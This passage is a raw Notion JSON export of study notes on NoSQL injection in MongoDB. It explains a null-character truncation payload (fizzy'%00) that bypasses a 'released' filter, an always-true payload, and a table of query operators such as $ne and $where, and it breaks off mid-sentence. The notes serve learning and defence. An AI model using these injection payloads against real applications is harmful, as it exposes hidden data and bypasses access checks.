1","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"250dc9c5-3059-806d-9e61-c95d3f9938d7","parent":{"type":"block_id","block_id":"250dc9c5-3059-8079-8c2a-c757e031aa86"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"→ Only shows “fizzy” products that are released (","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"→ Only shows “fizzy” products that are released (","href":null},{"type":"text","text":{"content":"released == 1","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"released == 1","href":null},{"type":"text","text":{"content":").","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":").","href":null}],"icon":null,"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-8094-b9ff-dea61e3ec9ee","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-80c0-a925-d6c7e2c2662f","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:02:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"The null character trick","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"The null character trick","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80b0-abf5-fcab3990d07b","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Null character:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Null character:","href":null},{"type":"text","text":{"content":" ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" ","href":null},{"type":"text","text":{"content":"\\u0000","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"\\u0000","href":null},{"type":"text","text":{"content":" (sometimes written as ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (sometimes written as ","href":null},{"type":"text","text":{"content":"%00","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"%00","href":null},{"type":"text","text":{"content":" in URLs).","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" in URLs).","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80c7-bc2c-c8087d606879","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Effect in MongoDB:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Effect in MongoDB:","href":null},{"type":"text","text":{"content":" Anything after ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Anything after ","href":null},{"type":"text","text":{"content":"\\u0000","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"\\u0000","href":null},{"type":"text","text":{"content":" can be ignored by the database.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" can be ignored by the database.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-804e-a1cd-e1a6cc8495df","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Injecting it lets you ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Injecting it lets you ","href":null},{"type":"text","text":{"content":"cut off the rest of the query","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"cut off the rest of the query","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-806a-a66d-f9397a805428","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-8095-ab00-dd9efaaec93f","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:02:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Example attack","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Example attack","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80b7-a18e-d45ece9e93ef","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"URL:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"URL:","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-809b-b4a2-df78d07490c2","parent":{"type":"block_id","block_id":"250dc9c5-3059-80b7-a18e-d45ece9e93ef"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"https://insecure-website.com/product/lookup?category=fizzy'%00","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"https://insecure-website.com/product/lookup?category=fizzy'%00","href":null}],"language":"plain text"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-8091-bf31-c44ec57661d3","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Query after injection:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query after injection:","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8085-8c15-c9b8b7b9b6b3","parent":{"type":"block_id","block_id":"250dc9c5-3059-8091-bf31-c44ec57661d3"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"this.category == 'fizzy'\\u0000' && this.released == 1","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"this.category == 'fizzy'\\u0000' && this.released == 1","href":null}],"language":"javascript"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-801f-b3ab-c9cbb595c78e","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Because MongoDB ignores everything after the null character, the ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Because MongoDB ignores everything after the null character, the ","href":null},{"type":"text","text":{"content":"this.released == 1","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"this.released == 1","href":null},{"type":"text","text":{"content":" check is skipped.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" check is skipped.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8071-bce3-df1d03d61dbb","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-806b-a987-d1d48f2919c0","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:02:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Result","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Result","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-809b-92b2-e66cdc255f03","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T15:01:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"You now see ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"You now see ","href":null},{"type":"text","text":{"content":"all products in the “fizzy” category","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"all products in the “fizzy” category","href":null},{"type":"text","text":{"content":", even unreleased ones (","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", even unreleased ones (","href":null},{"type":"text","text":{"content":"released == 0","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"released == 0","href":null},{"type":"text","text":{"content":").","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":").","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8079-99cb-dcc859cc1652","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T18:10:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"This is another way of ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This is another way of ","href":null},{"type":"text","text":{"content":"overriding existing conditions","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"overriding existing conditions","href":null},{"type":"text","text":{"content":" — you don’t just add always-true conditions (","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" — you don’t just add always-true conditions (","href":null},{"type":"text","text":{"content":"'|| '1'=='1","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'|| '1'=='1","href":null},{"type":"text","text":{"content":"), you also ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"), you also ","href":null},{"type":"text","text":{"content":"cut off conditions entirely","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"cut off conditions entirely","href":null},{"type":"text","text":{"content":" using null characters.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" using null characters.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8038-a6fe-cd37b5edd9cd","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ab-a3c3-efe8c8e6adab"},"created_time":"2025-08-15T15:01:00.000Z","last_edited_time":"2025-08-15T18:10:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[],"icon":null,"color":"default"},"archived":false}]}]}]},{"object":"block","id":"250dc9c5-3059-800d-be23-d9d0b87d363a","parent":{"type":"page_id","page_id":"24fdc9c5-3059-8063-ae3e-c3b8fd82eacc"},"created_time":"2025-08-15T18:13:00.000Z","last_edited_time":"2025-08-15T18:48:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"NoSQL operator injection","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"NoSQL operator injection","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8057-9b1a-cc856456bfe1","parent":{"type":"block_id","block_id":"250dc9c5-3059-800d-be23-d9d0b87d363a"},"created_time":"2025-08-15T18:19:00.000Z","last_edited_time":"2025-08-15T19:07:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Overview","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Overview","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8006-9a75-e960697ec978","parent":{"type":"block_id","block_id":"250dc9c5-3059-8057-9b1a-cc856456bfe1"},"created_time":"2025-08-15T18:14:00.000Z","last_edited_time":"2025-08-15T18:19:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"What it is:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"What it is:","href":null},{"type":"text","text":{"content":" Instead of just breaking syntax, you inject ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Instead of just breaking syntax, you inject ","href":null},{"type":"text","text":{"content":"query operators","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"query operators","href":null},{"type":"text","text":{"content":" to manipulate how the database interprets your input.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" to manipulate how the database interprets your input.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80c6-9430-cdb312d8e6da","parent":{"type":"block_id","block_id":"250dc9c5-3059-8057-9b1a-cc856456bfe1"},"created_time":"2025-08-15T18:14:00.000Z","last_edited_time":"2025-08-15T18:19:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Why it works:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Why it works:","href":null},{"type":"text","text":{"content":" NoSQL databases like MongoDB allow complex queries using operators like ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" NoSQL databases like MongoDB allow complex queries using operators like ","href":null},{"type":"text","text":{"content":"$$ne","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$ne","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"$$in","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$in","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"$$regex","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$regex","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":". If the application blindly inserts user input into a query, you can control its behavior.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":". If the application blindly inserts user input into a query, you can control its behavior.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80f2-a40e-f102ad57a3bb","parent":{"type":"block_id","block_id":"250dc9c5-3059-8057-9b1a-cc856456bfe1"},"created_time":"2025-08-15T18:14:00.000Z","last_edited_time":"2025-08-15T18:19:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-805d-b154-f8241c19f237","parent":{"type":"block_id","block_id":"250dc9c5-3059-8057-9b1a-cc856456bfe1"},"created_time":"2025-08-15T18:14:00.000Z","last_edited_time":"2025-08-15T18:19:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"heading_3","heading_3":{"rich_text":[{"type":"text","text":{"content":"Common MongoDB operators","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Common MongoDB operators","href":null}],"is_toggleable":false,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8047-8574-ed7a1473baf1","parent":{"type":"block_id","block_id":"250dc9c5-3059-8057-9b1a-cc856456bfe1"},"created_time":"2025-08-15T18:14:00.000Z","last_edited_time":"2025-08-15T18:19:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"table","table":{"table_width":2,"has_column_header":true,"has_row_header":false},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-8016-9b8d-e63866ec0a37","parent":{"type":"block_id","block_id":"250dc9c5-3059-8047-8574-ed7a1473baf1"},"created_time":"2025-08-15T18:14:00.000Z","last_edited_time":"2025-08-15T18:14:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"table_row","table_row":{"cells":[[{"type":"text","text":{"content":"Operator","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Operator","href":null}],[{"type":"text","text":{"content":"What it does","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"What it does","href":null}]]},"archived":false},{"object":"block","id":"250dc9c5-3059-8002-9013-de009da69311","parent":{"type":"block_id","block_id":"250dc9c5-3059-8047-8574-ed7a1473baf1"},"created_time":"2025-08-15T18:14:00.000Z","last_edited_time":"2025-08-15T18:14:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"table_row","table_row":{"cells":[[{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null}],[{"type":"text","text":{"content":"Runs a JavaScript expression and matches documents where the expression is true","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Runs a JavaScript expression and matches documents where the expression is true","href":null}]]},"archived":false},{"object":"block","id":"250dc9c5-3059-80a6-a373-dbc258fc6d21","parent":{"type":"block_id","block_id":"250dc9c5-3059-8047-8574-ed7a1473baf1"},"created_time":"2025-08-15T18:14:00.000Z","last_edited_time":"2025-08-15T18:18:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"table_row","table_row":{"cells":[[{"type":"text","text":{"content":"$$ne","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$ne","href":null}],[{"type":"text","text":{"content":"Matches all values that are not equal to a specified value.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Matches all values that are not equal to a specified value.","href":null}]]},"archived":false},{"object":"block","id":"250dc9c5-3059-800d-9579-d5ed96e972be","parent":{"type":"block_id","block_id":"250dc9c5-3059-8047-8574-ed7a1473baf1"},"created_time":"2025-08-15T18:14:00.000Z","last_edited_time":"2025-08-15T18:14:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"table_row","table_row":{"cells":[[{"type":"text","text":{"content":"$$in","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$in","href":null}],[{"type":"text","text":{"content":"Matches values that exist in a specified array","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Matches values that exist in a specified array","href":null}]]},"archived":false},{"object":"block","id":"250dc9c5-3059-80fb-988b-ec8fd7395738","parent":{"type":"block_id","block_id":"250dc9c5-3059-8047-8574-ed7a1473baf1"},"created_time":"2025-08-15T18:14:00.000Z","last_edited_time":"2025-08-15T18:14:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"table_row","table_row":{"cells":[[{"type":"text","text":{"content":"$$regex","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$regex","href":null}],[{"type":"text","text":{"content":"Matches values that fit a regular expression pattern","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Matches values that fit a regular expression pattern","href":null}]]},"archived":false}]}]},{"object":"block","id":"250dc9c5-3059-802d-afa7-f46e91b1bb25","parent":{"type":"block_id","block_id":"250dc9c5-3059-800d-be23-d9d0b87d363a"},"created_time":"2025-08-15T18:19:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Submitting query operators","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Submitting query operators","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-80eb-8588-c7cf2d16c081","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"When trying to inject operators into a NoSQL query, you need to format your input so the backend interprets it as JSON (or as query parameters if it expects URL input).","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"When trying to inject operators into a NoSQL query, you need to format your input so the backend interprets it as JSON (or as query parameters if it expects URL 